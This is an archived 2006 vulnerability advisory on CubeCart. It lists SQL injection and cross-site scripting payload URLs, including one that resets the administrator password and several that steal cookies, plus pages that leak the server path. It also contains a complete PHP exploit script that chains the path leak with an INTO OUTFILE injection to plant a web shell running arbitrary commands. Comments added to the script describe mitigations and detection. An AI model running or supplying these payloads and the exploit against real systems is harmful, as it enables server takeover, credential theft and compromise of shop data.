securityvulnsSecurityvulnsSECURITYVULNS:DOC:14444
HistorySep 27, 2006 - 12:00 a.m.

CubeCart Multiple input Validation vulnerabilities


Hello,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL
Copyright : HACKERS PAL
Website : http://www.soqor.net
Email Address : [email protected]

SQL injection

admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
This request resets the administrator's password: the injected or 1=1 makes the user_name condition true for every row.

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*

view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

view_doc.php?view_doc=-1'%20union%20select%201,2/*

admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*
/***************************************/
XSS (cross-site scripting)
admin/print_order.php?order_id=<script>alert(document.cookie);</script>

view_order.php?order_id=<script>alert(document.cookie);</script>

admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript>
admin/nav.php?la_search_home=<script>alert(document.cookie);</script>
The language variables used by this file are affected as well.

admin/image.php?image=<script>alert(document.cookie);</script>

admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script>
admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script>
admin/header.inc.php?charset='><script>alert(document.cookie);</script>
All other variables in this file are affected as well.

footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>

header.inc.php?site_name=</title><script>alert(document.cookie);</script>
All other variables in this file are affected as well.

/***************************************/

Full path disclosure

information.php
language.php
link_navi.php?cat_id=1
list_docs.php
popular_prod.php
sale.php
check_sum.php
spotlight.php
cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* CubeCart Remote sql injection exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
/*
/* Tested on CubeCart 2.0.X and maybe other versions are injected
/
print_r('
/
/
/
CubeCart Remote sql injection exploit /
/
by HACKERS PAL <[email protected]> /
/
site: http://www.soqor.net /');
// Usage guard: when no target argument is given, print the usage text and stop.
if ($argc<2) {
print_r('
/
/
/
Usage: php '.$argv[0].' host
/
Example: /
/
php '.$argv[0].' http://localhost/CubeCart/
/
***/
');
die;
}
// Silence PHP error output, lift the execution-time limit, and set the
// default socket timeout to 5 seconds.
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

// Base URL of the target installation, taken from the first command-line argument.
$url=$argv[1];
// Path of the first request. The advisory text lists cat_navi.php among the
// scripts that disclose the full installation path.
$exploit1="/cat_navi.php";
// get_page: fetch $url and return the response body as a string.
// Uses file_get_contents() when that function exists; otherwise opens the URL
// with fopen() and reads it in 1024-byte chunks, appending each to $contents.
// NOTE(review): parentheses and quotes in this listing appear as HTML entities
// (&#40; &#41; &quot;), presumably an artefact of how the page was archived.
Function get_page($url)
{

              // Preferred path: one call returns the whole body.
              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          // Fallback path: stream read in 1024-byte pieces until fread() returns an empty/false value.
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }

 // Step 1: request cat_navi.php and keep the response for path extraction.
 $page = get_page&#40;$url.$exploit1&#41;;

         // Keep the text between the second <b> and the next </b> in the response.
         // NOTE(review): presumably this is the file path PHP prints in bold in its
         // error message; the advisory lists cat_navi.php under "Full path".
         $pa=explode&#40;&quot;&lt;b&gt;&quot;,$page&#41;;
         $pa=explode&#40;&quot;&lt;/b&gt;&quot;,$pa[2]&#41;;
         // Swap the script name for soqor.php to form the server-side output path.
         $path = str_replace&#40;&quot;cat_navi.php&quot;,&quot;&quot;,$pa[0]&#41;.&quot;soqor.php&quot;;
         // Build a lone backslash (backslash + space, then strip the space) and
         // convert backslashes in the path to forward slashes.
         $var=&#39;&#92; &#39;;
         $var  = str_replace&#40;&quot; &quot;,&quot;&quot;,$var&#41;;
         $path = str_replace&#40;$var,&quot;/&quot;,$path&#41;;
         // Step 2: the view_doc parameter carries a UNION SELECT ... INTO OUTFILE
         // that asks MySQL to write a PHP file at $path; that file passes
         // $_GET[cmd] to system().
         // Defender notes: the chain depends on (a) view_doc reaching the query
         // unescaped, (b) the leaked path from step 1, (c) the database account
         // holding the FILE privilege, and (d) the database server being able to
         // write into the web root. Casting/binding view_doc, turning off
         // display_errors, revoking FILE (or restricting secure_file_priv) and
         // keeping the web root non-writable each break it.
         // Detection: "union select" or "INTO OUTFILE" in request URLs in the
         // access log, and unexpected new .php files (here soqor.php) in the
         // application directory.
         $exploit2=&quot;/view_doc.php?view_doc=-1&#39;&#37;20union&#37;20select&#37;20&#39;&lt;?php&#37;20system&#40;&quot;.&#39;$_GET[cmd]&#39;.&quot;&#41;;&#37;20?&gt;&#39;,&#39;WwW.SoQoR.NeT&#39;&#37;20INTO&#37;20OUTFILE&#37;20&#39;$path&#39;&#37;20from&#37;20store_docs/*&quot;;
 $page_now = get_page&#40;$url.$exploit2&#41;;
 // The script treats the string "mysql_fetch_array()" in the response as its success signal.
 // NOTE(review): presumably the page emits that warning because the injected
 // statement returns no result set; confirm against the application code.
 if&#40;ereg&#40;&quot;mysql_fetch_array&#40;&#41;&quot;,$page_now&#41;&#41;
 {
      // Print the URL of the written file, collapsing "//" to "/" in the string.
      $newurl=$url.&quot;/soqor.php?cmd=id&quot;;
      Echo &quot;&#92;n[+] Go TO &quot;.str_replace&#40;&quot;//&quot;,&quot;/&quot;,$newurl&#41;.&quot;&#92;n[+] Change id to any command you want :&#41;&quot;;
 }
 else
 {
      Echo &quot;&#92;n[-] Exploit Faild&quot;;
 }
 // Print the closing banner and exit.
 Die&#40;&quot;&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;

?>

#WwW.SoQoR.NeT